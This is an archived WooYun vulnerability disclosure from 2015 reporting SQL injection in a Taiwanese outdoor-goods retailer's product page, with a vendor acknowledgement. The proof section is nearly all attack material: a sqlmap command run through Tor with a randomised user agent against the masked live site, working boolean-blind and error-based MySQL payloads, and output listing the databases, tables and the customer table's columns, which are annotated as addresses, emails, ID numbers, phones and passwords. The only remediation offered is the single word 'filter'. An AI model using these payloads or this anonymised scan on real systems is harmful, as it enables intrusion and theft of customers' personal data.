当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0159631

漏洞标题:某戶外休閒用品有限公司SQL注入(影响上千用户)(臺灣地區)

相关厂商:某戶外休閒用品有限公司

漏洞作者: 路人甲

提交时间:2015-12-10 15:45

修复时间:2016-01-25 18:01

公开时间:2016-01-25 18:01

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-10: 细节已通知厂商并且等待厂商处理中
2015-12-14: 厂商已经确认,细节仅向厂商公开
2015-12-24: 细节向核心白帽子及相关领域专家公开
2016-01-03: 细节向普通白帽子公开
2016-01-13: 细节向实习白帽子公开
2016-01-25: 细节向公众公开

简要描述:

某戶外休閒用品有限公司SQL注入(影响上千用户)

详细说明:

某戶外休閒用品有限公司SQL注入(影响上千用户)

漏洞证明:

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUS --union-char=N -u "**.**.**.**/products.php?master_sn=27.." --is-dba --current-db --dbs
---
Parameter: master_sn (GET)
Type: boolean-based blind
Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)
Payload: master_sn=27.. AND MAKE_SET(2760=2760,3553)
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: master_sn=-2395 OR 1 GROUP BY CONCAT(0x716a716271,(SELECT (CASE WHEN (4821=4821) THEN 1 ELSE 0 END)),0x7170707071,FLOOR(RAND(0)*2)) HAVING MIN(0)#
---
web application technology: Apache
back-end DBMS: MySQL 5
current database: 'lifeoutdoors'
current user is DBA: False
available databases [2]:
[*] information_schema
[*] lifeoutdoors
Database: lifeoutdoors
+---------------------+---------+
| Table | Entries |
+---------------------+---------+
| product_tb | 1086 |
| member_tb | 994 | ===> 上千用户
| product_tb_bak | 416 |
| order_goods_tb | 256 |
| order_detail_tb | 121 |
| order_tb | 121 |
| order_serial_tb | 119 |
<.....>
Database: lifeoutdoors
Table: member_tb
[15 columns]
+--------------------+--------------+
| Column | Type |
+--------------------+--------------+
| member_address | varchar(100) | =====> 地址
| member_birth_day | varchar(10) |
| member_birth_month | varchar(10) |
| member_birth_year | varchar(10) |
| member_email | varchar(100) | =====> 电邮
| member_id | varchar(100) | =====> 也许是身分证
| member_mobile | varchar(100) | =====> 电话
| member_name | varchar(100) |
| member_nickname | varchar(100) |
| member_passwd | varchar(100) | =====> 密码
| member_send_mail | varchar(10) |
| member_sex | char(1) |
| member_sn | int(5) |
| member_tel | varchar(100) |
| member_used | char(1) |
+--------------------+--------------+

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:17

确认时间:2015-12-14 16:16

厂商回复:

感謝通報

最新状态:

暂无